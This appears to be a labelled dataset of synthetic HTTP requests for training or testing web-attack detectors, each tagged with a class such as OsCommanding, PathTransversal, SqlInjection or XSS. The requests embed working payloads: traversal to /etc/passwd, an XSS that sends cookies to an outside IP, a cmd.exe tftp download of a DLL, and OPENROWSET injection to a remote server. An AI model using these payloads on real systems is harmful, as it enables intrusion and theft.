Authorization: NTLM c2hzZWVpdXVlaXR0YXVlaWN0aWNsbm1oYTgzZmlOb3RkdGZucGVlYXNvZXBPdmFw
Range: -579124,02412-
Referer: http://X7r9ee.ch/s9aryce8.jpg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.1 (Machintosh; U; Mac OS X 5.0; si-hh; rv:8.5.5) Gecko/00224739
UA-Pixels: 784x5970
Via: 6.5 164.187.12.106:0737
Transfer-Encoding: nr4ymt
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 0.11.203.195
X-Serial-Number: 215734
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48346
Start - Id: 43087
class: OsCommanding
GET /682cNB0pm/l2@SgNJy-fY/bt/oewgaiaq.gif?bierhtstrhedkf=ciewp-cu9d&hlbaxs4Acxneiu=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fcat+%2Fetc%2Fpasswd%7C&ttehli=6879214&tuteU=061821&qle=5344582&lsod=lwNTdpjyF2&edd=31834&tau8iAtnaySmos=lJ1.%40mTcK HTTP/1.1
Host: www.lsgl9s.be:7
Connection: keep-alive
Accept: audio/*, image/jpeg, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: oT1jtElf-5lIr;q=0.9, sdnjde-a;q=0.7, hauen-roat9e4;q=0.3, ubmi-6uahimWm, Eiosoa-aUosl;q=0.8
Cache-Control: no-cache
Cookie: lkssdsTro=jxNhuWCs;aattvau=7anT;acTe0t0LaF=-aorcaHlrhgd7ue;xRp1k6fJTKG=c@Ri.bO0a;cwntDdh=yu$o;igsaoeena38ceoe=hFbm8h-XrG
Date: Sun, 02 Nov 08 04:45:04 CET
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Match: *
If-Range: Tue, 02 Dec 08 16:10:30 UTC
Max-Forwards: 843
Pragma: ctInin='weshar'
Referer: /ibinl/eastke.css
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 5.6; ai-ae; rv:8.7.1) Gecko/47741452
UA-OS: Mac OS X
Via: 9.3 116.85.239.108, 1.0 www.hhgdlr.gif, FTP/9.1 57.72.25.186

null

End - Id: 43087
Start - Id: 45021
class: PathTransversal
PUT /dDmmBbSrEd/tn/sZIha7UTRCi0aK/hys/hioru3h6hacfyonsayo/nv/ichtXopaanrTRlyVg1g.jpg? HTTP/1.1
Content-Length: 234
Content-Language: eGictdf,oeb
Content-Encoding: deflate
Content-Location: /m286.cfm
Content-Type: application/x-www-form-urlencoded
Host: 196.160.216.154
Connection: emsjRE
Accept: */*;q=0.0
Accept-Encoding: collection(   file:///c:/iaha/am1ts.xml )
Accept-Language: *
Cache-Control: only-if-cached
Date: Tue, 26 Jul 05 20:23:24 CET
Expect: ro1la
If-Unmodified-Since: Sat, 26 Dec 09 12:35:17 CET
Max-Forwards: 6744
Authorization: NTLM dGN3ZWVhZXQzb2VvaGh1ZTllb1lnM2xlZWRuY3JwemFlZXNhck5zZmxp
Referer: /Tweo/nrrLNo.wav
User-Agent: Mozilla/3.9 (compatible; Tie5Td; Solaris; tset; zet3)
UA-Disp: 420,669,16
Via: 4.8 111.148.80.219, 0.5 www.hdxn.gif:4, aGy/2.2 www.oA60esa.jpg

nitswdeiHxE=ses0erHiim&fdjnebachslbf=eewteaznesuon&Rls9a2=33489390&rtrep=tiotjdnuht1ONemiHw&tkan5=nQ4G3&if=2tLlNatqN3&SrtvumoN==5ysatlR4ol&REnpsner9na0a=76919820&id=aceoeB&gN6=leeiu&sdjSdaDoTnb=07414547&oebza5=cs@&eiejwc=passwd at

End - Id: 45021
Start - Id: 49745
class: XPathInjection
GET /5VFkogWeZJt/Hlbgsoundt8T_q7EQACG/UjLxEGSv/KhRmxtermIhnRcYp9/nZ7DSMMn29Hp_VRPzcdh.jsp?e62nvx=sXuQL.YGSTi%40&ws=9%3Ar&EFxYKZnph-=snDinclude+h&IngWyOtuttHs=eoe8h%27+++or+++++1%3C++8fnta%2Faitgt%2Fat4oLi%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D55%5D+++++or+++%27gos%27++++%3D++++%27&oiz=2in&Sace=11e%3B+1oo+eia+ourrtt&tAbeo=6&no=1so8taayixnig&ie=8336658&S8F3pojE0=s+eo&5b9RhxjeSojyIe=edbL++edE&eiCdtTelesttyu=5650000080&evalqIngCgk=hweaeeenet&ehrbtycjy=%29s5Sconnectttlm%7C%24&lrIRi=s HTTP/1.1
Host: www.srrama.com
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh, x-mac-chinesesimp, windows-1253
Accept-Encoding: deflate, deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: max-age=5691
Client-ip: 24.134.122.55
Cookie: stdiretoip5L=tf4|;d4JduXnull7HA=deitj;ss=chtaccesbem'ms4ttmpi D[Xp;J_P@y8rDz=0twhae
Cookie2: $Version="4"
Date: Sat, 22 Nov 08 22:31:02 GMT
ETag: "sMfN7FOz1rBZfHdD2"
Expect: Cltc
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 02 Dec 07 23:11:16 CET
If-Unmodified-Since: Wed, 13 Aug 08 21:00:14 CET
If-Match: "fkxUqCNikiz4VpiCvm"
If-None-Match: *
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 2
MIME-Version: 0.1
Pragma: smoomr='tSisist'
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -1702
Referer: /s9tsm/a4e4a/cariyS/fdugada.tiff
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: xbnana (rTd3dC3j2; ak0cXI; 7iAn_pj; mN6F-E; hT9vG6NI5V)
UA-CPU: x86
UA-Disp: 676,3592,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 413x0589
Via: rlhoG/4.3 www.roetf.tiff, FTP/9.4 169.16.95.11
Transfer-Encoding: gzip
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49745
Start - Id: 45747
class: PathTransversal
GET /6egi6ryyArciinee/sSIlSMX6TWFe8XixWJ/a9rerinsnmgriei7utdp.shtml?@vD0U=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.1
Host: www.rothgt.gov:085
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 9.140.249.36
Cookie: tfWrecg=59;nROtxwrsmsqae=tdL;oywl=Ota;dew=die+
Cookie2: $Version="34"
Date: Sun, 07 Feb 10 01:18:53 GMT
ETag: "@sm4d6_EmJB2BlXXqg7"
Expect: 100-continue
From: eyebc4et@nriRuu.de
If-Modified-Since: Mon, 04 Feb 08 10:20:21 UTC
If-Unmodified-Since: Wed, 18 Jan 06 21:18:40 UTC
If-Match: "bLbXfUfEmhZKj7Kq3"
If-None-Match: *
If-Range: *
Max-Forwards: 5868
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: wptoa ypehsb8=2pbhrh0a
Authorization: Digest cnonce="2sary"
Range: -500252,934-3694
Referer: http://www.oynl.de/mntiuo.php3
TE: chunked,gzip;q=0.8,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.7 (Windows; U; Windows NT 6.8; ld-tU; rv:7.8.2) Gecko/50192944
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 337x559
Via: HTTP/1.9 www.Ossa.png
Transfer-Encoding: 3Epmo
Upgrade: e5r/8.9, sadhn/5.0, mdrxl/0.0, i4auie/7.0
Warning: 665 www.fiYe23m4.htm:79508 "hman" "Fri, 20 Oct 06 22:19:29 UTC"
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45747
Start - Id: 43480
class: OsCommanding
GET /a58Bx/beocselg/fE0mXWXHgr.asmx?1tht=zy%3Dd9athtmpneRl%25iw&NDp.Y6-8jS=tmpme&Fdconnect5=3763271317&auoiaee=oen&lhoedati=%2Fperl+++%2Ftmp%2Fntmaansi.pl+-p7553&NvarhSVVq.se=8g&85=ynxsotuotssaefeo&0qemlnhdue=oroegqf&qlXq=sh7-Sc&S1p7Gooq=ve%3B4%27jaPUlss-nph-suh+like&rdeae13mtdlswm5=juRt3+e%3Agaain7shutdowno HTTP/1.1
Host: www.siuwors3ft.org
Connection: close
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: so-7rgrtqrr
Cache-Control: min-fresh=79
Client-ip: 53.145.96.238
Cookie: dncHtoee=84;hf=0947515
Cookie2: $Version="51"
Date: Sun, 06 Aug 06 13:52:24 GMT
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: 0rhyil@a9lhonata.it
If-Modified-Since: Sun, 14 Dec 08 10:46:10 UTC
If-Unmodified-Since: Tue, 27 Mar 07 19:37:43 CET
If-Match: *
If-None-Match: *
If-Range: "Wmd_O-l-lqCtDPu7G@2b"
Max-Forwards: 499
MIME-Version: 9.2
Pragma: h='de'
Proxy-Authorization: Basic aWFuZTZjZTp6ZHNk
Authorization: snnone tsht4=D3doear
Referer: http://www.4heaox.fr/rbOssu/eoneArrr/punw.swf
TE: gzip,chunked;q=0.4
Trailer: Range
User-Agent: 6nhahnhe (nw9vSr)
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: 7.9 www.3fdsttd.png
Transfer-Encoding: deflate
Upgrade: fnnrrl/9.4, febrea/6.3, qsal/0.4, T0ng5e/2.6
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 43480
Start - Id: 43332
class: OsCommanding
GET /a2Y92FE2j/YworA0/8ieotjtaXRtTnr0t/tosiihsZx2bo6/8n/tKW2ORVKhTrccMsMnMo/lPfVAXULAV/uCrmupdate9oI9iHEM8R/raZC/iG.html?pnSqGqP6=3&19connect5Pform=saaO&aeheteaae=hfwSBu%40hc%3E%29age9&sebstltfeem9h1r=0692909&iqIle4sgainnsg=tcrXNaj3aEcteeU&0GIsock_streamZg=Inlh&etn=m%25+%3EoeaDt2d&Kunion4@Pybnph-0=%2Fperl++++%2Ftmp%2Fgeelni.pl+++-p1640&tfmZ3tkiod=xp_esntei&ptouoewWiiko=enPbmk8UZtK HTTP/1.0
Host: www.pmn5.ch
Connection: close
Accept: audio/*;q=0.0, text/*
Accept-Charset: x-mac-turkish, koi8-r;q=0.2, iso-8859-9
Accept-Encoding: 
Accept-Language: MlsGnoSl-oshmiabe
Cache-Control: no-store
Client-ip: 72.77.48.25
Cookie: leaXEn=-7;SfasooVhriel=frtcoOErh5radmeo;ievr=755535
Cookie2: $Version="4"
Date: Tue, 10 Jul 07 14:54:03 CET
ETag: "21fLlo7mOtYun2Bj1tw"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Wed, 05 Jan 05 14:56:12 UTC
If-Unmodified-Since: Mon, 07 Apr 08 01:24:41 GMT
If-Match: "HAxyEgt3qex4WD3UPOY"
If-None-Match: "5KThrFU1eLcVmMiy"
If-Range: Thu, 03 May 07 08:33:34 CET
Max-Forwards: 16
MIME-Version: 7.9
Pragma: ycaxhook='an1'
Proxy-Authorization: NTLM Y05pc3B3bmVpa3dlclBhOGFubWxlY296cmlkbmdTaWFyeWVjeWlp
Authorization: Digest response="3A0571bDBf28ccff2F26aC8b19bAAC90"
Range: -3
Referer: http://www.id4Chfxo.uk/oaamSFm5/nailcoe/hrsseihe/crsqtCr0/6tuCsr.msf
TE: trailers
Trailer: Via
User-Agent: Mozilla/7.1 (X11; U; SunOS sun4u 1.2; on-br; rv:9.6.5) Gecko/46498255
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 105x8065
Via: 2.7 234.49.214.176, 8.2 www.vir8g.css
Transfer-Encoding: fmdaee
Upgrade: EC4/0.8, cEeq/4.6, ezga1/4.0, sop/3.8, d63oen/6.6
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 100296896076
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43332
Start - Id: 45463
class: PathTransversal
GET /nqyuwy@yu.cfm?ganhs=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&tnarm0r=m%25nfCrr&tjEs7tn=soo1uetsvn&2rHa=52784&ug=149368 HTTP/1.0
Host: 115.98.6.224
Connection: close
Accept: image/*, text/*, application/zip
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: ts=bhje
Client-ip: 39.180.100.162
Cookie: EraB1iOQONV=inUfuBYAW;eae6nimtjyfg=e<:;na8sqVeiJstbEn=]j;UJU7xmlbIhttps=weh;8t=16;epo=128
Cookie2: $Version="91"
Date: Wed, 22 Sep 04 18:09:16 UTC
ETag: "MWQpBPOD6G9PQ6YY5D"
Expect: 100-continue
From: eso4Aae@o0ky0.it
If-Modified-Since: Mon, 19 Jan 04 13:39:38 UTC
If-Unmodified-Since: Mon, 16 Nov 09 13:43:56 UTC
If-Match: *
If-None-Match: "IBMbyZkaRyr6hk-yAc7J"
If-Range: Sat, 08 Sep 07 20:30:10 CET
Max-Forwards: 8519
Pragma: no-cache
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: ianw cFnsazM=HpFt
Range: -23,7962-,63876-540949
Referer: http://www.nstloeso.cz/5tzS/psti/ilpb.pl
TE: trailers,chunked
Trailer: Host
User-Agent: m0oetneeosnohhaoennO
UA-CPU: Sparc
UA-Disp: 1778,2316,8
UA-OS: Win9x
UA-Color: color8
Via: Ehles/8.4 www.ft17.tiff, HTTP/5.3 www.FTri.css
Transfer-Encoding: deflate
Upgrade: drf/1.3, eoe/9.9
Warning: 398 216.136.8.238 "ivry" 
X-Forwarded-For: 93.18.219.115
X-Serial-Number: 347804024892974921
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45463
Start - Id: 47202
class: XSS
GET /tRIja/e0q.BhE@ow9t/f0L0etab31Etezmcisa/iosegcn9trDot.pl?ipaeesshIunlxx=Oom&5u.tmp78=%3D+9aedea1ws&yn8tbemnra=tN%27%28s0&fNa_B@A_ZzpositionC=5tewetIrtrseA&f0yx2.lqLK=lAOqex&tO-echo=09660&rTef2ti5=%3Cdiv+++onmouseover+%3D++++%22++++%5Bwindow.open%28%27http%3A%2F%2F139.64.102.238%2Felns.jsp%27%2Bdocument.cookie%29%3B%5D+%22+++%3E&tdjug=bsnITegmochaeg1luu&tit4ldltwehr7=mvNtElocationebo2pr&io7chNon=o%28o6&oewpry8i4gE6l=n%3Erincludeer6mr%28nnae0nt&kesaottteaae=e%3E+t%7Chlpxm%3Cl&nssejlZn=+eopenm+e&jcd6dsesetrWs=931 HTTP/1.0
Host: www.olrihts80.uk
Connection: ueDetf
Accept: */*;q=0.0
Accept-Charset: macintosh, gb2312, hz-gb-2312;q=0.6
Accept-Encoding: identity;q=0.9, identity;q=0.0
Accept-Language: dnimvuh-ifsttrb5, l-e0dai;q=0.2, Cdnl-oi;q=0.1, tsin8D-f;q=0.4, ie-k9cNs
Cache-Control: no-store
Client-ip: 63.161.16.102
Cookie: fb80gawfo=rEtoe;A0dpasswdSIsg8=Nei;lm9l1nE4h3is=wree;kbJj='o ;MaQf2g9Wdz=5165448;@vlogfobjectlpasswdS=saoinivhdgieoaupit
Cookie2: $Version="35"
Date: Wed, 26 May 04 08:04:53 CET
ETag: W/"sgzTyQPOVZPttH244HNT"
Expect: 100-continue
From: oUzNrsR@euuilaosen.cz
If-Modified-Since: Fri, 15 Jul 05 02:54:36 UTC
If-Unmodified-Since: Sat, 26 Jun 04 10:15:04 GMT
If-Match: *
If-None-Match: *
If-Range: "K6hLdMPJPUPnTW8"
Max-Forwards: 7
MIME-Version: 9.5
Pragma: lttyp9=a
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: NTLM aDVlU2Uyc3RmaDlkbXRMRmhudG9kdHMwQmVvYXRKdWlhZW9ocHR0dXd2aUNvdHl6
Range: 676-108618,2650-4238
Referer: /ceeaitd/gsdo/nrxddAt/hEItei/eewprs.htm
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/8.0 (Machintosh; U; Mac OS X 6.1; h5-fe; rv:6.4.0) Gecko/18184716
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 286x017
Via: ohg/0.0 www.sa4jsm.jpeg
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 04739435468972088
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47202
Start - Id: 42306
class: SqlInjection
GET /oR5jGuo/eoaso0/0izyeGlH6/wneanAeeRae7pdndko/GQechogviU.js?eiahomeslsA_=passthruodhm9i&twnhnaeyee=eGpABY&rsDA=yi&e8hz8yk9Ie=lt+efntna5t&ZxHBo7.4=%3B+++++insert+++into++OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3DlptNHa%3Bpwd%3Dassan%3BNetwork%3DDBMSSOCN%3BAddress%3D52.219.191.29%2C1433%3B%27%2C%27select+*+from+++++_sysdatabases%27+++%29%3B+select++++*+++from++LinkedOrRemoteSrv1.master.dbo.sysdatabases&0h1hvari1JnCsam=dtS0bKlG&irgnAb=eO3tsdieigt7sgt8eS&f8tptnplD=92&sz1ee8=2377860&i1waNtczsh=5&d0L=ebnp&ehgwf=yonr&Dkluncpnad=Aetrdocumentv5oiInq&fl=5 HTTP/1.0
Host: 140.117.177.50
Connection: ecnhMut
Accept: */*
Accept-Charset: iso-8859-6;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=53471
Client-ip: 37.43.143.81
Cookie: 1st1tFdska=iiumesIe;nkedcaytni7a=ddadmin;Enro1f=5;ndimam4dubT=odabme cs;ccgj5t=e0v
Cookie2: $Version="871"
Date: Thu, 21 Aug 08 19:53:09 GMT
ETag: "NrIBh7YV-x.@lBq@zb"
Expect: eSOo=Euhs
From: ebsew@sn8ns6e.de
If-Modified-Since: Sun, 19 Sep 04 19:46:45 GMT
If-Unmodified-Since: Wed, 06 Oct 04 06:18:07 CET
If-Match: *
If-None-Match: "CRKpXqM6e2@5Eflq"
If-Range: Tue, 26 Oct 04 24:38:59 GMT
Max-Forwards: 2
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM aTZzY3QzcnVzNG1zbHpSQWRwb2V0c2tvNWVjdG50bHJsb01H
Authorization: Basic dHZhSWJjaTpucmVVdzk=
Range: -568889,-588214
Referer: /d5hilpHt/hooI8ra/drwxss/kzlI/taay.png
TE: deflate;q=0.8
Trailer: If-Range
User-Agent: etdhRAbeyti4g
UA-CPU: Sparc
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4371x6437
Via: ciay/1.9 www.ifeK.html
Transfer-Encoding: deflate
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 69.110.54.143
X-Serial-Number: 807714416153290560
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42306
Start - Id: 39216
class: SSI
GET /tULfkyIMU/d4Mn/zlud.mspx?tismhdsc=it%26Anc&AsiNii=oincludeIx5d3loc&tpsioine9lntth=%3Celinkecaecd%3B&allbcx=477937&3jova4y=dIg+d9oeq&a6Zeetcn.jrH=334&VJgmHdocumentG4=88&s3ndmdtsi=eihlmo&axs_hQz=35397399&tedcorl7nla=tUTSKJ&15kne=%3C%21--%23email+fromhost%3D%22www.hosndi.com%22+tohost%3D%22mailbox.tmse.com%22+message%3D%22tsglaf+e2oveh+aijilc9+0h3%22+fromaddress%3D%227tc4hr.com%22+toaddress%3D%22lttn.EBeada.com%22+subject%3D%22a%22+sender%3D%22awna.com%22+replyto%3D%22eaixcmv.com%22+cc%3D%22ti0e%22+inreplyto%3D%22B9o+stRu+3aNdc%22+id%3D%22sdmail%22+--%3E HTTP/1.1
Host: 34.3.230.83
Connection: keep-alive
Accept: text/plain;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.7, gzip, deflate;q=0.6
Accept-Language: lrah-Pselh7ee, ie2sh-Tts
Cache-Control: no-transform
Client-ip: 24.82.201.85
Cookie2: $Version="9"
Date: Fri, 22 Apr 05 17:55:07 UTC
ETag: "stS0mrsBNpQBIdeOv"
From: eobt@sitnTmdv.ch
If-Modified-Since: Fri, 27 Oct 06 04:44:51 GMT
If-Unmodified-Since: Wed, 14 Nov 07 11:38:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Aug 05 04:33:46 UTC
Max-Forwards: 2
Range: 5962-
Referer: /anara.rar
User-Agent: Euhiti3h9e
UA-Disp: 7987,886,16
UA-Color: color32
Via: 5.7 www.tfonaMw.css:441, 0.2 www.mtexl.shtml, HTTP/1.8 134.78.58.99
Transfer-Encoding: rprtus
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 988 51.40.12.35 "rctnf7iObtnydwbkia" "Sat, 31 Dec 05 16:12:13 GMT"
----: -------------------------------

null

End - Id: 39216
Start - Id: 44119
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.ckqgln.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=75
Client-ip: 178.250.250.231
Cookie: YTCdivC=%e;IuXe=and
Cookie2: $Version="896"
Date: Fri, 15 Jul 05 22:49:35 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: edi6llee@iwIc9.ch
If-Modified-Since: Wed, 31 Jan 07 20:22:15 GMT
If-Unmodified-Since: Sun, 18 Jan 09 09:25:20 CET
If-Match: *
If-None-Match: "v9taLmA2KHvsnCWYhh7H"
If-Range: Sat, 11 Apr 09 13:22:06 GMT
Max-Forwards: 7400
MIME-Version: 5.1
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 6-5561
Referer: /Nptxkt/muba/Ier8lkge/sdlr.ace
TE: trailers
Trailer: Date
User-Agent: fsuowD/9.7.4
UA-CPU: x86
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: compress
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44119
Start - Id: 48794
class: XPathInjection
GET /o1w/sLYxZjg/5.yu/silveMe1sehaU/J3HAII/nFIUO@UMHRyp.css?nCxivVEX0u.-=e%40Z&ubla3=%3AC9utrnmi&slhj=ihte%2Fh8n9%2Fem%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D46%5D++++or+++++%27ameclaa%27++%3D++%27&a8u=betue9mSatetuposition&tDEmfI6lh=3E5 HTTP/1.1
Host: www.loweo.com
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.3, deflate, compress
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 208.70.172.168
Cookie: Hscsuaehs=0769;noratte9rwal=qLs8q
Cookie2: $Version="7"
Date: Thu, 08 Mar 07 06:47:20 GMT
ETag: W/"gTz@WD@id8M7yzIPzc"
Expect: 100-continue
From: rokltsth@ewew.uk
If-Modified-Since: Sun, 05 Aug 07 10:19:33 UTC
If-Unmodified-Since: Thu, 30 Oct 08 12:50:32 GMT
If-Match: "jG.f3nc1sD9gKE9oKd."
If-None-Match: "74HR2O4YVz1@XdjWuPQv"
If-Range: *
Max-Forwards: 1879
MIME-Version: 7.6
Pragma: aidoo='9Utgrr2e'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: NTLM Z1NzbHJOYTZpazFlZ2hlcmFlcWFpa3I1YWVzaW1zV3JjcnNzb3JldE1jOA==
Range: -2670
Referer: http://www.afeehege.ch/eEnoDn6/dq6rGr.php4
TE: gzip
Trailer: If-Match
User-Agent: hliVu6pnhj (s2pblJdg9)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 435 www.dsxS.html:99 "eing" "Thu, 16 Jun 05 09:56:23 CET"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48794
Start - Id: 42223
class: SqlInjection
GET /iw_hk/aIzGWq1Z8kP6GKTS-Ves/aEpseg8/ozhy/erd/qapegaS4oerwl/r.uxGM0mq1XYuF03/wNdUhXscript/lTcOHO_HSV6Rl8_cD/4optbgsoundCrL.php4?ea1egsN=a&olroletls2=egyMnullh%7EIlu-rubt%3C&pr3hefmoCT=nw33z15TYV9f&aentrldyrTyd=%27+UNION++++++++++++ALL+++++++++SELECT+++rzn+++++FROM+++tsrnefan+++++WHERE++++%27%27+%3D%27&TsUuE=1gesemli%2B0ebNj&EknYcatHps@=sx&h5SheFemhmaae=89074668&iuie=childwynA&h2=rut&glnsOm=winntinti&edR4ocNreloSt=0548069&Awcsgl3kninsst=4&pIc=%5D%28&tsrayh=%40bodyfhm&aRht=sit HTTP/1.1
Host: 45.35.109.231
Connection: close
Accept: image/jpeg;q=0.2, application/*, application/*;q=0.7
Accept-Charset: x-mac-ce, iso-8859-15;q=0.0
Accept-Encoding: 
Accept-Language: Eej-59EqcTf, scr6a66r-l;q=0.9, e-o9ni, zi9-r4g, l-t;q=0.0
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="35"
Date: Thu, 26 May 05 17:31:18 UTC
ETag: W/"tXiGyLYJXuOw39ER0"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Sun, 27 Mar 05 18:19:05 GMT
If-Unmodified-Since: Sat, 08 Aug 09 22:29:58 UTC
If-Match: "NCKukWukmNVxIKFT5p"
If-None-Match: "ok5DSQf1opGcR0D"
If-Range: "nQD8RjO5nsCm4fa88OPP"
Max-Forwards: 52
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic eXJoZTc6dEVpZXQ=
Authorization: Basic UnRvZG9ubzplbGVvMTV4
Range: 19-17
Referer: http://wut3cn.be/chsIn.jpeg
TE: trailers
Trailer: If-Range
User-Agent: nna60 (iRZ.dioDZ)
UA-CPU: x86
UA-Disp: 6743,482,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 0.4 www.blend6Ua.html:9
Transfer-Encoding: deflate
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42223
Start - Id: 42933
class: OsCommanding
GET /3OXuTgZBVOm2/tTE9Nx3078ogmli/ilDE5QLOMX7X_q-/htas/Qmy/Nouap/hT/OFg67__vxxq/5kJiQeNQ5dtklogIcmd/caziaeeJuhae/rhyaaeIkaclge7.html? HTTP/1.0
Host: www.z5ltw.cz:80
Connection: woHe
Accept: */*;q=0.6
Accept-Charset: euc-kr
Accept-Encoding: ';uftp     -g  /home/erin/orenonnase  157.98.132.98    /etnaes  ;
Accept-Language: *;q=0.4
Cache-Control: max-stale=92827
Client-ip: 226.241.221.163
